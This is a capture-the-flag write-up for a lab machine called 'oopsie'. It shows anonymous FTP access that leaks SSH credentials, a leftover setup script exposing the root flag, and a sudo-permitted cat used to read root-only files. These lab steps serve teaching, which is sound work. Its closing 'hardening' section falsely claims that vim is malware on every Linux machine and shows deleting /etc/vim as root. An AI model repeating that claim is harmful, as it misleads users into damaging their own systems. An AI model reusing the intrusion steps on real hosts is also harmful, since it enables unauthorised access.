oopsie

Prenote

This box was made by one of my friends, from my CTF team, The WINRaRs. The creator's name is fieldraccoon, go show him some love <3

Enumeration

Firstly, let's start with an nmap scan.

☁  oopsie  nmap -T4 -A -v 10.10.129.130 > scan.txt
☁  oopsie  cat scan.txt

Nmap scan report for 10.10.129.130
Host is up (0.034s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp            14 Dec 27 07:42 creds.txt
|_-rw-r--r--    1 ftp      ftp            17 Dec 27 07:10 test.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.20.228
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 2a:21:f6:7e:2e:3a:d4:db:7a:5b:70:94:c4:c2:74:28 (DSA)
|   2048 ab:40:78:0e:ae:9f:65:23:de:f9:3b:1f:24:1e:67:a2 (RSA)
|   256 3d:87:4d:70:56:d4:1b:09:9c:6c:f3:5b:66:c7:42:bf (ECDSA)
|_  256 a5:70:42:45:b8:ca:a9:70:6d:13:4f:9b:5f:23:03:6e (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Interesting, we see 2 ports open, an ftp with anonymous ftp login allowed, and 2 files, creds.txt and test.txt.

Foothold

Well, let's try anonymously log in to this ftp server.

☁  oopsie  ftp 10.10.129.130
Connected to 10.10.129.130.
220 (vsFTPd 3.0.2)
Name (10.10.129.130:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

When connecting to an anonymous ftp server, you often do not need a password, so when prompted for one, just press enter.

We're in. Let's go to passive mode and find these files.

ftp> passive
Passive mode on.
ftp> ls
227 Entering Passive Mode (10,10,129,130,163,156).
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp            14 Dec 27 07:42 creds.txt
-rw-r--r--    1 ftp      ftp            17 Dec 27 07:10 test.txt

Files! Let's read them both.

ftp> get creds.txt -
remote: creds.txt
227 Entering Passive Mode (10,10,129,130,249,6).
150 Opening BINARY mode data connection for creds.txt (14 bytes).
john:P@ssw0rd
226 Transfer complete.
14 bytes received in 0.00 secs (402.1140 kB/s)
ftp> get test.txt -
remote: test.txt
227 Entering Passive Mode (10,10,129,130,71,210).
150 Opening BINARY mode data connection for test.txt (17 bytes).
vsftpd test file
226 Transfer complete.
17 bytes received in 0.00 secs (721.8071 kB/s)

Of this, the most interesting I see is the credential combination of 

john:P@ssw0rd

Can we potentially use this elsewhere?

User

Referring back to our nmap scan, we see the ssh service also running. Maybe we can use these creds to get in to ssh.

kali➜~» ssh john@10.10.129.130                                                                                                                                                                                                  [13:56:24]
The authenticity of host '10.10.129.130 (10.10.129.130)' can't be established.
ECDSA key fingerprint is SHA256:3/TUzfGxOPu2WgEO2RBkKDGxQPn+CsscxVBenTzhIa4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.129.130' (ECDSA) to the list of known hosts.
john@10.10.129.130's password: 
Welcome to Ubuntu 14.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

New release '16.04.7 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Your Hardware Enablement Stack (HWE) is supported until April 2019.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

And we're in, let's check for a user flag.

john@ubuntu:~$ ls
examples.desktop  user.txt
john@ubuntu:~$ cat user.txt
flag{i_hope_this_worked}

Yay! User!

Root(method 1)

If we go one directory level up, let's have a look for other directories we could potentially access.

john@ubuntu:~$ cd ..
john@ubuntu:/home$ ls
fieldraccoon  ftptest  ftp-testuser  john

Let's start off by going into fieldraccoon's directory. 

john@ubuntu:/home$ cd fieldraccoon/
john@ubuntu:/home/fieldraccoon$ ls
Desktop  Documents  Downloads  examples.desktop  Music  new-vm  Pictures  Public  Templates  Videos

One of these directories are suspicious, new-vm . Let's go into there and delve further.

john@ubuntu:/home/fieldraccoon$ cd new-vm/
john@ubuntu:/home/fieldraccoon/new-vm$ ls
data
john@ubuntu:/home/fieldraccoon/new-vm$ cd data/
john@ubuntu:/home/fieldraccoon/new-vm/data$ ls
our_vsftpd.conf  setup.sh

Weird, what's this script? Let's have a read of it and work out what it does.

john@ubuntu:/home/fieldraccoon/new-vm/data$ cat setup.sh
sudo apt-get update

sudo apt-get install -y vsftpd
sudo apt-get install -y openssh-server 

# ssh s**t
sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.factory-defaults
sudo chmod a-w /etc/ssh/sshd_config.factory-defaults
sudo systemctl restart ssh

# ftp firewall allow
sudo ufw allow 20/tcp
sudo ufw allow 21/tcp

# ftp config
sudo cp data/our_vsftpd.conf /etc/vsftpd.conf
sudo service vsftpd restart

# ftp file serve
sudo mkdir -p /var/ftp/pub
sudo chown nobody:nogroup /var/ftp/pub
echo "john:P@ssw0rd" | sudo tee /var/ftp/pub/creds.txt

sudo bash -c 'echo "flag{i_hope_this_worked}" > /home/john/user.txt'
sudo chown john:john /home/john/user.txt
sudo chmod u+rx /home/john/user.txt
sudo chmod u-w /home/john/user.txt
sudo chmod go-rwx /home/john

sudo bash -c 'echo "flag{root_flag_poggers}" > /root/root.txt'
sudo chown root:root /root/root.txt
sudo chmod u+rx /root/root.txt
sudo chmod u-w /root/root.txt
sudo chmod go-rwx /root

Interesting, this may have been a script the creator ran to setup the machine and forgot to remove. Line 30 shows: 

sudo bash -c 'echo "flag{root_flag_poggers}" > /root/root.txt'

This shows us this flag being echoed into the root flag file, maybe we can try this as the root flag?

It worked!

Root(method 2)

Let's give sudo -l a run to see what we can do.

john@ubuntu:/$ sudo -l
Matching Defaults entries for john on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on ubuntu:
    (ALL) NOPASSWD: /bin/cat

Wow, we can cat files! Let's maybe guess where the root flag would be hiding and cat it!

john@ubuntu:/$ sudo cat /root/root.txt
flag{root_flag_poggers}

It worked!

Root(method 3)

Tired and out of options, let's try social engineering! I kindly asked the author what the account password was. He obliged.

Let's try this with the name fieldraccoon.

kali➜~» ssh fieldraccoon@10.10.185.114                                                                                                                                                                                          [14:42:52]
fieldraccoon@10.10.185.114's password: 
Welcome to Ubuntu 14.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

New release '16.04.7 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Your Hardware Enablement Stack (HWE) is supported until April 2019.
Last login: Sun Dec 27 03:26:21 2020 from 192.168.42.129

And we're in. Let's get the root flag.

fieldraccoon@ubuntu:~$ sudo su
[sudo] password for fieldraccoon: 
root@ubuntu:/home/fieldraccoon# ls
Desktop  Documents  Downloads  examples.desktop  Music  new-vm  Pictures  Public  Templates  Videos
root@ubuntu:/home/fieldraccoon# cd
root@ubuntu:~# cd /root
root@ubuntu:~# ls
root.txt
root@ubuntu:~# cat root.txt
flag{root_flag_poggers}

It worked!

Lessons to learn: Hardening your own machine's services

Our first way of getting user was exploiting ftp. Let's harden ftp so people can't exploit it in future.

This can be done by opening /etc/vsftpd.conf and changing the line anonymous_enable to NO.

Have a check on your ubuntu machine to see if this is set like this.

Lessons to learn 2: Deleting setup scripts

This is a pretty easy thing to do. Before putting a machine in production, make sure there's no setup script, and removing any.

root@ubuntu:/# ls
bin  boot  cdrom  dev  etc  home  initrd.img  lib  lib64  lost+found  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var  vmlinuz
root@ubuntu:/# cd home
root@ubuntu:/home# ls
fieldraccoon  ftptest  ftp-testuser  john
root@ubuntu:/home# cd fieldraccoon
root@ubuntu:/home/fieldraccoon# ls
Desktop  Documents  Downloads  examples.desktop  Music  new-vm  Pictures  Public  Templates  Videos
root@ubuntu:/home/fieldraccoon# cd new-vm/data
root@ubuntu:/home/fieldraccoon/new-vm/data# rm setup.sh 
root@ubuntu:/home/fieldraccoon/new-vm/data# ls
our_vsftpd.conf

Making our machine more secure!

Lessons to learn 3: Removing malware

There is a piece of malware installed on every linux machine named vim. Please delete this at your earliest convenience, as it is bad for the system.

This can be done via the following:

root@ubuntu:~# cd /etc/vim
root@ubuntu:/etc/vim# ls
vimrc  vimrc.tiny
root@ubuntu:/etc/vim# rm vimrc
root@ubuntu:/etc/vim# rm vimrc.tiny
root@ubuntu:/etc/vim# cd ..
root@ubuntu:/etc# rmdir vim
root@ubuntu:/etc# ls
acpi                    brltty.conf           deluser.conf         gnome              inputrc          lintianrc       mtools.conf       popularity-contest.conf  rmt                subgid           upstart-xsessions
adduser.conf            ca-certificates       depmod.d             gnome-app-install  insserv          locale.alias    nanorc            ppp                      rpc                subgid-          usb_modeswitch.conf
alternatives            ca-certificates.conf  dhcp                 groff              insserv.conf     localtime       netscsid.conf     profile                  rsyslog.conf       subuid           usb_modeswitch.d
anacrontab              calendar              dictionaries-common  group              insserv.conf.d   logcheck        network           profile.d                rsyslog.d          subuid-          vbox
apg.conf                chatscripts           dkms                 group-             iproute2         login.defs      NetworkManager    protocols                samba              sudoers          vmware-tools
apm                     colord.conf           dnsmasq.d            grub.d             issue            logrotate.conf  networks          pulse                    sane.d             sudoers.d        vsftpd.conf
apparmor                compizconfig          doc-base             gshadow            issue.net        logrotate.d     newt              python                   securetty          sysctl.conf      vsftpd.conf_default
apparmor.d              console-setup         dpkg                 gshadow-           john             lsb-release     nsswitch.conf     python2.7                security           sysctl.d         vsftpd.conf.orig
apport                  cracklib              drirc                gtk-2.0            kbd              ltrace.conf     obex-data-server  python3                  selinux            systemd          vtrgb
apt                     cron.d                emacs                gtk-3.0            kernel           machine-id      opt               python3.4                sensors3.conf      terminfo         wgetrc
aptdaemon               cron.daily            environment          hdparm.conf        kernel-img.conf  magic           os-release        rc0.d                    sensors.d          thermald         wodim.conf
at-spi2                 cron.hourly           firefox              host.conf          kerneloops.conf  magic.mime      pam.conf          rc1.d                    services           thunderbird      wpa_supplicant
avahi                   cron.monthly          fonts                hostname           ldap             mailcap         pam.d             rc2.d                    sgml               timezone         X11
bash.bashrc             crontab               fstab                hosts              ld.so.cache      mailcap.order   papersize         rc3.d                    shadow             ucf.conf         xdg
bash_completion         cron.weekly           fstab.d              hosts.allow        ld.so.conf       manpath.config  passwd            rc4.d                    shadow-            udev             xml
bash_completion.d       cups                  fstab.orig           hosts.deny         ld.so.conf.d     mime.types      passwd-           rc5.d                    shells             udisks2          yum
bindresvport.blacklist  cupshelpers           ftpusers             hp                 legal            mke2fs.conf     pcmcia            rc6.d                    signond.conf       ufw              zsh_command_not_found
blkid.conf              dbus-1                fuse.conf            ifplugd            libaudit.conf    modprobe.d      perl              rc.local                 signon-ui          updatedb.conf
blkid.tab               dconf                 gai.conf             iftab              libnl-3          modules         pki               rc.local.vmimport        skel               update-manager
bluetooth               debconf.conf          gconf                init               libpaper.d       modules-load.d  pm                rcS.d                    speech-dispatcher  update-motd.d
brlapi.key              debian_version        gdb                  init.d             libreoffice      mtab            pnm2ppa.conf      resolvconf               ssh                update-notifier
brltty                  default               ghostscript          initramfs-tools    lightdm          mtab.fuselock   polkit-1          resolv.conf              ssl                UPower
root@ubuntu:/etc#

Malware is gone!

Final Thoughts

I hope you enjoyed this writeup. Skills learnt here involve:

  • Enumeration via nmap

  • Exploitation of anonymous ftp

  • Checking directories for flags.

  • Hardening ftp

  • Removing vim

PreviousRoomsNextOHSiNT

Last updated

Was this helpful?